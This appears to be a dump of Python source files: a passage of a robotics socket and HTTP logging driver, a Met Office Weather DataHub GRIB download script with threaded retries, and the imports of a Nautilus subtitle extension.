            self.socket.settimeout(config['timeout'])
        self.bufsize = config.get('bufsize', 1024)
        self.bus = bus

    def _send(self, data):
        # Transport-specific send; must be provided by subclasses.
        raise NotImplementedError()

    def start(self):
        self.input_thread.start()
        self.output_thread.start()

    def join(self, timeout=None):
        self.input_thread.join(timeout=timeout)
        self.output_thread.join(timeout=timeout)

    def run_input(self):
        # Receive loop: runs until the bus shuts down; timeouts just retry.
        while self.bus.is_alive():
            try:
                data = self.socket.recv(self.bufsize)
                if len(data) > 0:
                    self.bus.publish('raw', data)
            except socket.timeout:
                pass

    def run_output(self):
        # Send loop: forward 'raw' bus messages out; ends on bus shutdown.
        try:
            while True:
                __, channel, data = self.bus.listen()
                if channel == 'raw':
                    self._send(data)
                else:
                    assert False, channel  # unsupported channel
        except BusShutdownException:
            pass

    def request_stop(self):
        self.bus.shutdown()
class LogTCPBase(LogSocket):
    """
    TCP base class for different use cases
    """

    def __init__(self, config, bus):
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # https://stackoverflow.com/questions/31826762/python-socket-send-immediately
        # https://stackoverflow.com/questions/3761276/when-should-i-use-tcp-nodelay-and-when-tcp-cork
        # TCP_NODELAY disables Nagle's algorithm so small writes are not delayed.
        soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        super().__init__(soc, config, bus)

    def _send(self, data):
        # NOTE(review): socket.send() may transmit fewer bytes than given;
        # consider sendall() if partial sends matter for these messages.
        self.socket.send(data)
class LogTCPStaticIP(LogTCPBase):
    """TCP driver for a device at a fixed, known address (e.g. SICK LIDAR)."""

    def __init__(self, config, bus):
        super().__init__(config, bus)
        try:
            self.socket.connect(self.pair)
        except socket.timeout:
            # Report which address failed before propagating the error.
            print('Timeout', self.pair)
            raise
class LogTCPDynamicIP(LogTCPBase):
    """
    TCP driver for dynamic previously unknown address
    (ROS proxy for subscribers)
    """
    def start(self):
        # on start the address is unknown - it will be received by "output_thread"
        self.output_thread.start()

    def join(self, timeout=None):
        # the "input_thread" is triggered by "output_thread" so make sure
        # that "output_thread" is finished and cannot cause race condition
        self.output_thread.join(timeout=timeout)
        try:
            self.input_thread.join(timeout=timeout)
        except RuntimeError:
            # input_thread may never have been started (no 'addr' message
            # arrived) and joining an unstarted thread raises RuntimeError.
            pass

    def run_output(self):
        # Same loop as the base class plus an 'addr' channel that delivers
        # the peer address, triggers the connect and starts the reader.
        try:
            while True:
                __, channel, data = self.bus.listen()
                if channel == 'raw':
                    self._send(data)
                elif channel == 'addr':
                    self.pair = tuple(data)
                    self.socket.connect(self.pair)
                    if not self.input_thread.is_alive():
                        self.input_thread.start()
                else:
                    assert False, channel  # unsupported channel
        except BusShutdownException:
            pass
class LogTCPServer(LogTCPBase):
    """
    TCP driver for server side - prepare connection and wait
    for others to connect (ROS proxy for publishers)
    """
    def __init__(self, config, bus):
        super().__init__(config, bus)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.pair)
        # Timeout is re-applied to the *accepted* connection in run_input().
        self.timeout = config.get('timeout')

    def run_input(self):
        # Wait for a single client, then delegate to the base reader loop.
        if self.verbose:
            print("Waiting ...")
        self.socket.listen(1)
        if self.verbose:
            print("end of listen")
        while self.bus.is_alive():
            try:
                # NOTE(review): the listening socket is replaced by the
                # accepted connection here, so only one client is ever
                # served and the listener is no longer referenced.
                self.socket, addr = self.socket.accept()
                if self.verbose:
                    print('Connected by', addr)
                if self.timeout is not None:
                    self.socket.settimeout(self.timeout)
                super().run_input()
                break
            except socket.timeout:
                pass
class LogUDP(LogSocket):
    """UDP variant: datagrams are sent to the configured (host, port) pair."""

    def __init__(self, config, bus):
        udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        super().__init__(udp_sock, config, bus)
        try:
            self.socket.bind(('', self.pair[1]))
        except OSError as err:
            # [Errno 98] Address already in use - another process owns the
            # port, so attach to it instead of receiving on it.
            # NOTE(review): other OSError values are silently ignored here;
            # confirm that is intended.
            if err.errno == 98:
                self.socket.connect(('', self.pair[1]))

    def _send(self, data):
        self.socket.sendto(data, self.pair)
class LogHTTP:
    """Poll a URL in a background thread and publish each body as 'raw'."""

    def __init__(self, config, bus):
        bus.register('raw')
        self.bus = bus
        self.url = config['url']
        self.sleep = config.get('sleep', None)
        self.input_thread = Thread(target=self.run_input, daemon=True)

    def start(self):
        self.input_thread.start()

    def join(self, timeout=None):
        self.input_thread.join(timeout=timeout)

    def run_input(self):
        """Fetch self.url repeatedly until the bus shuts down."""
        while self.bus.is_alive():
            try:
                # https://github.com/mesonbuild/meson/issues/4087
                # without timeout the call can hang the process forever
                with urllib.request.urlopen(self.url, timeout=0.5) as resp:
                    body = resp.read()
            except socket.timeout:
                pass
            else:
                if body:
                    self.bus.publish('raw', body)
            if self.sleep is not None:
                self.bus.sleep(self.sleep)

    def request_stop(self):
        self.bus.shutdown()
if __name__ == "__main__":
    # Ad-hoc smoke test: stream from a local TCP server for two seconds
    # and record everything received into a timestamped log file.
    import time
    from osgar.bus import Bus
    config = {'host':'localhost', 'port': 8001, 'timeout': 1.0}
    with LogWriter(prefix='test-tcp-') as log:
        bus = Bus(log)
        device = LogTCPStaticIP(config, bus=bus.handle('tcp'))
        device.start()
        time.sleep(2)
        device.request_stop()
        device.join()

# vim: expandtab sw=4 ts=4
|
cda_download.py | # 2021 (C) Crown Copyright, Met Office. All rights reserved.
#
# This file is part of Weather DataHub and is released under the
# BSD 3-Clause license.
# See LICENSE in the root of the repository for full licensing details.
# (c) Met Office 2022
import csv, os
import requests
import argparse
import time
from datetime import datetime
import queue
import threading
import uuid
# Example code to download GRIB data files from the Met Office Weather DataHub via API calls

# Model identifiers this script knows how to download.
MODEL_LIST = ["mo-global", "mo-uk", "mo-uk-latlon", "mo-mogrepsg"]
BASE_URL = "https://api-metoffice.apiconnect.ibmcloud.com/metoffice/production/1.0.0"
debugMode = False  # overridden by the -z/--debug command-line flag
printUrl = False  # overridden by the -x/--printurl command-line flag
retryCount = 3  # attempts made when querying the latest model runs
def get_order_details(
    baseUrl, requestHeaders, orderName, useEnhancedApi, runsToDownload
):
    """Fetch the latest details for one order from the Weather DataHub API.

    Returns the parsed JSON response, or terminates the process (exit())
    on a non-200 status.  Reads the module-level ``verbose``, ``apikey``
    and ``printUrl`` flags set up in ``__main__``.
    """
    details = None
    actualHeaders = {"Accept": "application/json"}
    actualHeaders.update(requestHeaders)
    url = baseUrl + "/orders/" + orderName + "/latest"
    if useEnhancedApi:
        url = url + "?detail=MINIMAL"
        # A run filter can only be applied when exactly one run is requested.
        if len(runsToDownload) == 1:
            url = url + "&runfilter=" + runsToDownload[0]
    req = requests.get(url, headers=actualHeaders)
    if verbose and apikey == "":
        # Presumably the rate-limit headers are only returned on the APIM
        # (client id/secret) route - verify before relying on them.
        print("Plan and limit : " + req.headers["X-RateLimit-Limit"])
        print("Remaining calls: " + req.headers["X-RateLimit-Remaining"])
    if printUrl == True:
        print("get_order_details: ", url)
        if url != req.url:
            print("redirected to: ", req.url)
    if req.status_code != 200:
        print(
            "ERROR: Unable to load details for order : ",
            orderName,
            " status code: ",
            req.status_code,
        )
        exit()
    else:
        details = req.json()
    return details
def get_order_file(
    baseUrl, requestHeaders, orderName, fileId, guidFileNames, folder, start
):
    """Download one GRIB file of an order into ``folder``.

    Returns ``[ttfb, local_filename]`` where ``ttfb`` is ``start`` plus the
    server-side elapsed time (time of first byte).  Raises Exception with
    ``(reason, status_code)`` args on any non-200 HTTP status.  In debug
    mode (module-level ``debugMode``) the user can interactively force a
    failure per file.
    """
    # If file id is too long or random file names required generate a uuid for the file name
    urlMod = ""
    global debugMode
    if len(fileId) > 100 or guidFileNames:
        local_filename = folder + "/" + str(uuid.uuid4()) + ".grib2"
    else:
        local_filename = folder + "/" + fileId + ".grib2"
    ttfb = 0
    url = baseUrl + "/orders/" + orderName + "/latest/" + fileId + "/data"
    if debugMode == True:
        urlMod = input(
            "Order: "
            + orderName
            + " File:"
            + fileId
            + "\n"
            + "Enter y to mimic a receive failure on file - 'go' to run to end> "
        )
        # If you put go all further runs will automatically go through
        if urlMod == "go":
            debugMode = False
    if debugMode == True and urlMod == "y":
        # Deliberately corrupt the URL (inserting "y" before /data) so the
        # request fails, mimicking a receive failure.
        url = (
            baseUrl
            + "/orders/"
            + orderName
            + "/latest/"
            + fileId
            + urlMod
            + "/data"
        )
    actualHeaders = {"Accept": "application/x-grib"}
    actualHeaders.update(requestHeaders)
    with requests.get(
        url, headers=actualHeaders, allow_redirects=True, stream=True
    ) as r:
        if printUrl == True:
            print("get_order_file: ", url)
            if url != r.url:
                print("redirected to: ", r.url)
        if r.status_code != 200:
            raise Exception("HTTP Reason and Status: " + r.reason, r.status_code)
        # Record time to first byte
        ttfb = start + r.elapsed.total_seconds()
        # Stream the body to disk in 8 KiB chunks.
        with open(local_filename, "wb") as f:
            for chunk in r.iter_content(chunk_size=8192):
                f.write(chunk)
    return [ttfb, local_filename]
def get_files_by_run(order, runsToDownload, numFilesPerOrder):
    """Group the order's file ids by forecast run.

    For every run in ``runsToDownload`` collect the file ids whose name
    contains the ``_+RR`` run marker.  ``numFilesPerOrder`` > 0 caps how
    many files are kept per run (0 means unlimited).
    """
    filesByRun = {}
    available = order["orderDetails"]["files"]
    for run in runsToDownload:
        marker = "_+" + run
        selected = []
        for entry in available:
            name = entry["fileId"]
            if marker in name:
                selected.append(name)
                if 0 < numFilesPerOrder <= len(selected):
                    break
        filesByRun[run] = selected
    return filesByRun
def download_worker():
    """Worker-thread body: process download tasks from the global taskQueue.

    Each task dict describes one file of one order; the outcome is appended
    to the task's shared ``responseLog`` list and, on failure, also to its
    ``downloadErrorLog``.  A ``None`` task is the poison pill that stops
    this worker.
    """
    if taskQueue:
        while True:
            downloadTask = taskQueue.get()
            if downloadTask is None:
                # Poison pill - exit the worker loop.  These are queued by
                # __main__ only after taskQueue.join() has returned, so the
                # missing task_done() here is harmless.
                break
            current_time = datetime.now().strftime("%H-%M-%S-%f")
            fileSize = 0
            errMsg = ""
            error = False
            timeToFirstByte = 0
            startTime = time.time()
            try:
                downloadResp = get_order_file(
                    downloadTask["baseUrl"],
                    downloadTask["requestHeaders"],
                    downloadTask["orderName"],
                    downloadTask["fileId"],
                    downloadTask["guidFileNames"],
                    downloadTask["folder"],
                    startTime,
                )
                timeToFirstByte = round((downloadResp[0] - startTime), 2)
                downloadedFile = downloadResp[1]
                fileSize = os.path.getsize(downloadedFile)
            except Exception as ex:
                error = True
                errMsg = ex.args
            completeTime = time.time()
            completeDuration = round((completeTime - startTime), 2)
            if error:
                # Record enough detail to rebuild the URL for a later retry.
                downloadTask["downloadErrorLog"].append(
                    {
                        "URL": downloadTask["baseUrl"]
                        + "/orders/"
                        + downloadTask["orderName"]
                        + "/latest/"
                        + downloadTask["fileId"]
                        + "/data",
                        "fileid": downloadTask["fileId"],
                        "currentTime": current_time,
                        "ordername": downloadTask["orderName"],
                        "folder": downloadTask["folder"],
                    }
                )
                downloadTask["responseLog"].append(
                    {
                        "order": downloadTask["orderName"],
                        "fileId": downloadTask["fileId"],
                        "error": error,
                        "fileSize": fileSize,
                        "errMsg": errMsg,
                        "time_to_first_byte": timeToFirstByte,
                        "duration": completeDuration,
                        "file": "",
                        "currentTime": current_time,
                    }
                )
                if verbose:
                    print(
                        "File: "
                        + downloadTask["fileId"]
                        + " failed "
                        + format(errMsg)
                        + "\n"
                    )
            else:
                downloadTask["responseLog"].append(
                    {
                        "order": downloadTask["orderName"],
                        "fileId": downloadTask["fileId"],
                        "error": error,
                        "fileSize": fileSize,
                        "errMsg": errMsg,
                        "time_to_first_byte": timeToFirstByte,
                        "duration": completeDuration,
                        "file": downloadedFile,
                        "currentTime": current_time,
                    }
                )
            taskQueue.task_done()
def write_failures(downloadErrorLog, fileName):
    """Write one failing download URL per line to ``fileName``.

    Nothing is written (and no file is created) when no failures were
    recorded.
    """
    if not downloadErrorLog:
        return
    # The with-statement closes the file; the previous explicit close()
    # inside the block was redundant and has been removed.
    with open(fileName, "w") as failurefile:
        failurefile.writelines(line["URL"] + "\n" for line in downloadErrorLog)
def write_summary(responseLog, fileName, sstartTime):
    """Write a per-order download summary: text header plus CSV detail rows.

    ``sstartTime`` is the datetime when processing of this order started.
    Reads the module-level ``verbose`` and ``numThreads`` set in
    ``__main__``.  Does nothing when there are no responses logged.
    """
    endTime = datetime.now()
    if not responseLog:
        return
    # Total bytes downloaded (previously accumulated with a manual index
    # loop that ignored its own loop variable).
    fileSizeTotal = sum(row["fileSize"] for row in responseLog)
    elapsed = str(round((endTime - sstartTime).total_seconds(), 2))
    totals_line = (
        "Total Files: "
        + str(len(responseLog))
        + " Total time taken: "
        + elapsed
        + "s Total Size: "
        + str(fileSizeTotal)
        + " Workers: "
        + str(numThreads)
        + "\n"
    )
    with open(fileName, "w", newline="") as csvfile:
        csvfile.write(
            "The download of order ["
            + responseLog[0]["order"]
            + "] started at: "
            + sstartTime.strftime("%d/%m/%Y %H:%M:%S")
            + " finished at: "
            + endTime.strftime("%d/%m/%Y %H:%M:%S\n")
        )
        csvfile.write(totals_line)
        csvfile.write("===== Detail Section =====\n")
        fieldnames = [
            "order",
            "duration",
            "time_to_first_byte",
            "fileSize",
            "fileId",
            "error",
            "errMsg",
            "file",
            "currentTime",
        ]
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for row in responseLog:
            writer.writerow(row)
    if verbose:
        print(" " + totals_line)
def join_files(responseLog, joinedFileName):
    """Concatenate every downloaded file into one, deleting the parts."""
    with open(joinedFileName, "wb") as merged:
        for record in responseLog:
            part_name = record["file"]
            with open(part_name, "rb") as part:
                # Copy in fixed-size chunks to keep memory use bounded.
                for chunk in iter(lambda: part.read(8192), b""):
                    merged.write(chunk)
            os.remove(part_name)
def get_my_orders(baseUrl, requestHeaders):
    """Return the caller's order list (minimal detail) as parsed JSON.

    Terminates the process (exit()) on a non-200 response.  Reads the
    module-level ``printUrl`` flag set in ``__main__``.
    """
    ordHeaders = {"Accept": "application/json"}
    ordHeaders.update(requestHeaders)
    ordurl = baseUrl + "/orders?detail=MINIMAL"
    ordr = requests.get(ordurl, headers=ordHeaders)
    if printUrl == True:
        print("get_my_orders: ", ordurl)
        if ordurl != ordr.url:
            print("redirected to: ", ordr.url)
    if ordr.status_code != 200:
        print("ERROR: Unable to get my orders list. Status code: ", ordr.status_code)
        exit()
    orddetails = ordr.json()
    return orddetails
def get_latest_run(modelID, orderName, modelRuns):
    """Return the latest run ("RR") for a model, or "done:RR" if seen before.

    The last processed run/date stamp of each order is persisted in
    ``<baseFolder><LATEST_FOLDER>/<orderName>.txt`` so repeated invocations
    do not download the same run twice.  Reads the module-level
    ``baseFolder`` and ``LATEST_FOLDER`` set in ``__main__``.
    """
    # modelRuns values look like "RR:<runDateTime>" (see get_model_runs).
    latestRun = modelRuns[modelID][:2]
    latestDate = modelRuns[modelID][3:]
    stamp = latestDate[:10] + ":" + latestRun
    # Compute the stamp-file path once instead of five times.
    stampFile = baseFolder + LATEST_FOLDER + "/" + orderName + ".txt"
    if not os.path.exists(stampFile):
        # First time we see this order - record the stamp and report the run.
        with open(stampFile, "w") as rf:
            rf.write(stamp)
    else:
        # Open the file and retrieve the last processed stamp.
        with open(stampFile, "r") as rf:
            laststamp = rf.read()
        if stamp > laststamp:
            # A newer run is available - update the stamp file.
            with open(stampFile, "w") as rf:
                rf.write(stamp)
        else:
            # Already processed - flag it so the caller can skip this run.
            latestRun = "done" + ":" + latestRun
    return latestRun
def get_model_runs(baseUrl, requestHeaders, modelList):
    """Query the latest complete run for every model in ``modelList``.

    Returns a dict mapping model id to "RR:<runDateTime>".  Each request is
    retried up to the module-level ``retryCount`` times with a 10 s pause;
    a model that never answers is simply absent from the result.
    """
    modelRuns = {}
    runHeaders = {"Accept": "application/json"}
    runHeaders.update(requestHeaders)
    for model in modelList:
        requrl = baseUrl + "/runs/" + model + "?sort=RUNDATETIME"
        for loop in range(retryCount):
            reqr = requests.get(requrl, headers=runHeaders)
            if printUrl == True:
                print("get_model_runs: ", requrl)
                if requrl != reqr.url:
                    print("redirected to: ", reqr.url)
            if reqr.status_code != 200:
                print(
                    "ERROR: Unable to get latest run for model: "
                    + model
                    + " status code: ",
                    reqr.status_code,
                )
                if loop != (retryCount - 1):
                    # Not the last attempt yet - back off and retry.
                    time.sleep(10)
                    continue
                else:
                    # Retries exhausted; give up on this model.
                    print("ERROR: Ran out of retries to get latest run for model: ")
                    break
            rundetails = reqr.json()
            rawlatest = rundetails["completeRuns"]
            # NOTE(review): an empty completeRuns list would raise IndexError
            # here - confirm the API always returns at least one entry.
            modelRuns[model] = rawlatest[0]["run"] + ":" + rawlatest[0]["runDateTime"]
            break
    return modelRuns
def run_wanted(allorders, ordername, latestrun):
    """Return True when ``latestrun`` is in the order's requiredLatestRuns.

    ``allorders`` is the parsed /orders response; an unknown order name
    yields False.  (Previously the loop kept scanning after a match and
    tracked a mutable flag; order ids are unique, so we can return on the
    first match.)
    """
    for ords in allorders["orders"]:
        if ords["orderId"] == ordername:
            return latestrun in ords["requiredLatestRuns"]
    return False
def order_exists(allorders, ordername):
    """Return True when ``ordername`` appears in the /orders response."""
    return any(entry["orderId"] == ordername for entry in allorders["orders"])
def get_model_from_order(allorders, ordername):
    """Return the modelId of the named order, or "Not found"."""
    return next(
        (entry["modelId"] for entry in allorders["orders"]
         if entry["orderId"] == ordername),
        "Not found",
    )
if __name__ == "__main__":
    # Folder layout created below the optional --location base folder.
    ROOT_FOLDER = "downloaded"
    LATEST_FOLDER = "latest"
    RESULTS_FOLDER = "results"
    FAILURES_FOLDER = "failures"
    parser = argparse.ArgumentParser(
        description="Download all the files for one or more order from the CDA delivery service."
    )
    parser.add_argument(
        "-u",
        "--url",
        action="store",
        dest="baseUrl",
        default=BASE_URL,
        help="Base URL used to access Weather DataHub API. Defaults to https://api-metoffice.apiconnect.ibmcloud.com/metoffice/production/1.0.0.",
    )
    parser.add_argument(
        "-c",
        "--client",
        action="store",
        dest="clientId",
        default="",
        help="REQUIRED: Client ID of your WDH Application",
    )
    parser.add_argument(
        "-s",
        "--secret",
        action="store",
        dest="secret",
        default="",
        help="REQUIRED: Your WDH API Gateway secret",
    )
    parser.add_argument(
        "-o",
        "--orders",
        action="store",
        dest="ordersToDownload",
        default="default_order",
        help="REQUIRED: Comma separated list of order names to download.",
    )
    parser.add_argument(
        "-r",
        "--runs",
        action="store",
        dest="orderRuns",
        default="00,06,12,18",
        help="Comma separated list of runs to download or -r latest to get latest run.",
    )
    parser.add_argument(
        "-w",
        "--workers",
        action="store",
        dest="workers",
        default=4,
        type=int,
        help="Number of workers used to perform downloads. Defaults to 4.",
    )
    parser.add_argument(
        "-j",
        "--join",
        action="store_true",
        dest="joinFiles",
        default=False,
        help="If present, all the downloaded files will be concatenated together.",
    )
    parser.add_argument(
        "-v",
        "--verbose",
        action="store_true",
        dest="verbose",
        default=False,
        help="Verbose mode.",
    )
    parser.add_argument(
        "-d",
        "--folderdate",
        action="store_true",
        dest="folderdate",
        default=False,
        help="Add the YYYYMMDDhhmm_RR to the download folder.",
    )
    parser.add_argument(
        "-l",
        "--location",
        action="store",
        dest="location",
        default="",
        help="The base folder to store files",
    )
    parser.add_argument(
        "-m",
        "--modellist",
        action="store",
        dest="modellist",
        default=MODEL_LIST,
        help="Pass the ist of models to support.",
    )
    parser.add_argument(
        "-a",
        "--retry",
        action="store_true",
        dest="retry",
        default=False,
        help="Retry again the failures automatically.",
    )
    parser.add_argument(
        "-p",
        "--retryperiod",
        action="store",
        dest="retryperiod",
        default="300",
        help="Retry delay in seconds.",
    )
    parser.add_argument(
        "-x",
        "--printurl",
        action="store_true",
        dest="printurl",
        default=False,
        help="Print all accessed URLs and redirects",
    )
    parser.add_argument(
        "-z",
        "--debug",
        action="store_true",
        dest="debugmode",
        default=False,
        help="Switch to debug mode.",
    )
    parser.add_argument(
        "-k",
        "--apikey",
        action="store",
        dest="apikey",
        default="",
        help="Use direct API Key when not via APIM.",
    )
    args = parser.parse_args()
    # Copy parsed arguments into the module-level names the helper
    # functions read.
    baseUrl = args.baseUrl
    clientId = args.clientId
    secret = args.secret
    orderRuns = args.orderRuns
    useEnhancedApi = True
    verbose = args.verbose
    folderdate = args.folderdate
    numThreads = args.workers
    myModelList = args.modellist
    joinFiles = args.joinFiles
    retry = args.retry
    retryperiod = args.retryperiod
    debugMode = args.debugmode
    baseFolder = args.location
    apikey = args.apikey
    printUrl = args.printurl
    if debugMode == True:
        print("WARNING: As we are in debug mode setting workers to one.")
        numThreads = 1
    if args.ordersToDownload == "":
        print("ERROR: You must pass an orders list to download.")
        exit()
    else:
        ordersToDownload = args.ordersToDownload.lower().split(",")
    # NOTE(review): these three lines unconditionally override the
    # -j/--join flag parsed above and hard-code the per-order file limit
    # and file-naming scheme - confirm this is intended.
    joinFiles = False
    numFilesPerOrder = 0
    guidFileNames = False
    # Client ID and secret must be supplied
    if (clientId == "" or secret == "") and apikey == "":
        print("ERROR: IBM client and secret must be supplied.")
        exit()
    if apikey == "":
        requestHeaders = {"x-ibm-client-id": clientId, "x-ibm-client-secret": secret}
    else:
        requestHeaders = {"x-api-key": apikey}
    if baseFolder != "":
        try:
            if baseFolder[-1] != "/":
                baseFolder = baseFolder + "/"
            os.makedirs(baseFolder, exist_ok=True)
        except OSError as error:
            print("ERROR: Base folder", baseFolder, "cannot be accessed or created.")
            exit()
    os.makedirs(baseFolder + ROOT_FOLDER, exist_ok=True)
    os.makedirs(baseFolder + LATEST_FOLDER, exist_ok=True)
    os.makedirs(baseFolder + RESULTS_FOLDER, exist_ok=True)
    os.makedirs(baseFolder + FAILURES_FOLDER, exist_ok=True)
    if verbose:
        print("Download Orders")
        print("===============")
    ordersfound = False
    # Get my orders for future reference
    myOrders = get_my_orders(baseUrl, requestHeaders)
    if len(myOrders["orders"]) == 0:
        print(
            "WARNING: You have no orders active on Weather DataHub. Please confirm some orders and try again."
        )
        exit()
    # For each of the orders to download get the model and add to my model list
    myModelList = []
    for orderName in ordersToDownload:
        newModel = get_model_from_order(myOrders, orderName)
        if newModel not in myModelList:
            myModelList.append(newModel)
    if verbose == True:
        print(
            "From the orders to process we have the following model list from active orders: ",
            myModelList,
        )
    if myModelList == [] or myModelList == ["Not found"]:
        print(
            "ERROR: No models could be extracted from the orders to process: "
            + str(ordersToDownload)
        )
        exit()
    myModelRuns = get_model_runs(baseUrl, requestHeaders, myModelList)
    retryManifest = []
    # Total number of files downloaded
    totalFiles = 0
    finalRuns = []
    myTimeStamp = datetime.now().strftime("%d-%b-%Y-%H-%M-%S")
    # Process selected orders, generating tasks for the worker to actually download the file.
    for orderName in ordersToDownload:
        initTime = datetime.now()
        responseLog = []
        downloadErrorLog = []
        if verbose:
            print("Processing: " + orderName)
        if not order_exists(myOrders, orderName):
            print(
                "ERROR: You've asked for an order called: "
                + orderName
                + " which doesn't appear in the list of active orders."
            )
            continue
        if orderRuns == "":
            runsToDownload = ["00", "06", "12", "18"]
        else:
            if orderRuns == "latest":
                modelToGet = get_model_from_order(myOrders, orderName)
                if modelToGet not in myModelList:
                    print(
                        "ERROR: No idea what model: "
                        + modelToGet
                        + " is so terminating!"
                    )
                    exit()
                runsToDownload = get_latest_run(modelToGet, orderName, myModelRuns)
                if runsToDownload[:4] == "done":
                    if verbose:
                        print(
                            "We have done this latest run "
                            + runsToDownload[5:]
                            + " already!"
                        )
                    continue
                # Do I want this run?
                finalRuns = []
                runWanted = run_wanted(myOrders, orderName, runsToDownload)
                if runWanted and verbose:
                    print("This run " + runsToDownload + " is wanted.")
                else:
                    # NOTE(review): this branch is also taken when the run
                    # IS wanted but verbose is off, and it then skips the
                    # order via continue - confirm this is intended.
                    if verbose:
                        print("This run " + runsToDownload + " is not wanted")
                    continue
                runsToDownload = runsToDownload.split(",")
                finalRuns.append(runsToDownload)
            else:
                runsToDownload = orderRuns.split(",")
                finalRuns = []
                # Ensure only runs wanted are asked for
                for checkRun in runsToDownload:
                    if run_wanted(myOrders, orderName, checkRun):
                        finalRuns.append(checkRun)
                    else:
                        print(
                            "WARNING: The run "
                            + checkRun
                            + " has been asked for but doesn't appear in the order "
                            + orderName
                        )
                runsToDownload = finalRuns
        if len(finalRuns) == 0:
            print(
                "WARNING: No runs for order "
                + orderName
                + "were found. Don't expect any data."
            )
            continue
        order = get_order_details(
            baseUrl, requestHeaders, orderName, useEnhancedApi, runsToDownload
        )
        if order != None:
            # Create queue and threads for processing downloads
            taskQueue = queue.Queue()
            taskThreads = []
            for i in range(numThreads):
                t = threading.Thread(target=download_worker)
                taskThreads.append(t)
            # End of set up threads
            ordersfound = True
            # Break down the files in to those needed for each run
            filesByRun = get_files_by_run(order, runsToDownload, numFilesPerOrder)
            # Now queue up tasks to down load each file
            for run in runsToDownload:
                if folderdate == True:
                    folder = (
                        baseFolder
                        + ROOT_FOLDER
                        + "/"
                        + initTime.strftime("%Y%m%d%H%M_")
                        + run
                        + "/"
                        + orderName
                        + "_"
                        + run
                    )
                else:
                    folder = baseFolder + ROOT_FOLDER + "/" + orderName + "_" + run
                os.makedirs(folder, exist_ok=True)
                for fileId in filesByRun[run]:
                    downloadTask = {
                        "baseUrl": baseUrl,
                        "requestHeaders": requestHeaders,
                        "orderName": orderName,
                        "fileId": fileId,
                        "guidFileNames": guidFileNames,
                        "folder": folder,
                        "responseLog": responseLog,
                        "downloadErrorLog": downloadErrorLog,
                    }
                    taskQueue.put(downloadTask)
        # Start the worker threads
        if ordersfound == False:
            print(
                "WARNING: No orders or runs were found from this list: ",
                ordersToDownload,
            )
            continue
        if verbose:
            print(" Starting downloads")
        for t in taskThreads:
            t.start()
        # Wait for all the queued scenarios to be processed
        taskQueue.join()
        # Stop all the threads (one poison pill per worker)
        for i in range(numThreads):
            taskQueue.put(None)
        for t in taskThreads:
            t.join()
        # Write out the summary CSV file
        summaryFileName = (
            baseFolder + "results/summary-" + orderName + "-" + myTimeStamp + ".txt"
        )
        failuresFileName = (
            baseFolder + "failures/summary-" + orderName + "-" + myTimeStamp + ".txt"
        )
        if len(downloadErrorLog) > 0:
            write_failures(downloadErrorLog, failuresFileName)
            print(
                "WARNING: there were",
                len(downloadErrorLog),
                "detected download failures\nDetails in file: " + failuresFileName,
            )
            if retry:
                retryManifest = retryManifest + downloadErrorLog
        write_summary(responseLog, summaryFileName, initTime)
        totalFiles = totalFiles + len(responseLog)
        if verbose and len(responseLog) > 0:
            print(" Created summary: " + summaryFileName)
    # End of order processing loop
    if verbose:
        print("All file downloads have been attempted.")
    # Do we have any retries we want to do
    if retry and len(retryManifest) > 0:
        if verbose:
            print("We have files to retry")
        totalFailures = len(retryManifest)
        failureRate = (totalFailures / totalFiles) * 100.00
        if verbose:
            print("The failure rate is", failureRate, "percent.")
        if totalFailures > 100:
            print(
                "ERROR: total failures of",
                totalFailures,
                "is more than the 100 limit can't recover.",
            )
            exit()
        if totalFailures == totalFiles:
            print(
                "ERROR: Everything failed for all",
                totalFiles,
                "files - terminating program.",
            )
            exit()
        if failureRate > 50.0 and totalFailures > 50:
            print(
                "ERROR: failure rate > 50 percent and more than 20 failures - terminating."
            )
            exit()
        # I can now retry
        # Wait for the asked time
        if verbose:
            print("Wait of", retryperiod, "starting.")
        time.sleep(int(retryperiod))
        if verbose:
            print("Wait of", retryperiod, "ended.")
        # Wait ended
        actualHeaders = {"Accept": "application/x-grib"}
        actualHeaders.update(requestHeaders)
        stillInError = []
        deleteFile = False
        for retryFile in retryManifest:
            if verbose:
                print("Re-trying " + retryFile["fileid"])
            startTime = time.time()
            # NOTE(review): orderName here is whatever value the order loop
            # finished with, not necessarily the order this retry file
            # belongs to - confirm intended.
            failuresFileName = (
                baseFolder
                + "failures/summary-"
                + orderName
                + "-"
                + myTimeStamp
                + ".txt"
            )
            summaryFileName = (
                baseFolder + "results/summary-" + orderName + "-" + myTimeStamp + ".txt"
            )
            if deleteFile == False:
                # Remove the old failures file once before the retry pass.
                if os.path.isfile(failuresFileName):
                    os.remove(failuresFileName)
                deleteFile = True
            error = False
            try:
                if apikey != "":
                    requestHeaders = {"x-api-key": apikey}
                if verbose:
                    print(
                        "Retrying",
                        baseUrl,
                        retryFile["ordername"],
                        retryFile["fileid"],
                        retryFile["folder"],
                    )
                downloadResp = get_order_file(
                    baseUrl,
                    requestHeaders,
                    retryFile["ordername"],
                    retryFile["fileid"],
                    False,
                    retryFile["folder"],
                    startTime,
                )
                fileSize = os.path.getsize(downloadResp[1])
            except Exception as ex:
                error = True
                errMsg = ex.args
                status = ex.args[1]
            if not error:
                # Append a RETRY-OK row in the same CSV shape write_summary uses.
                with open(summaryFileName, "a") as sumfile:
                    sumfile.write(
                        retryFile["ordername"]
                        + ",0,0,0,"
                        + retryFile["fileid"]
                        + ",False,RETRY-OK,"
                        + downloadResp[1]
                        + ","
                        + datetime.now().strftime("%H-%M-%S-%f")
                        + "\n"
                    )
                    sumfile.close()
            else:
                with open(failuresFileName, "a") as errfile:
                    errfile.write(
                        "File "
                        + retryFile["fileid"]
                        + " FAILED on retry. errMsg: "
                        + format(errMsg)
                        + " status: "
                        + str(status)
                        + "\n"
                    )
                    errfile.close()
                stillInError.append(retryFile.copy())
# End of python program
|
nautilus-subliminal.py | # -*- coding: utf-8 -*-
from __future__ import division
from collections import defaultdict
from datetime import timedelta
import locale
from locale import gettext as _
import os
import threading
from babelfish import Language
from gi.repository import GObject, Gtk, Nautilus
from subliminal import (VIDEO_EXTENSIONS, AsyncProviderPool, __copyright__, __version__, check_video, compute_score,
get_scores, provider_manager, refine, refiner_manager, region, save_subtitles, scan_video,
scan_videos)
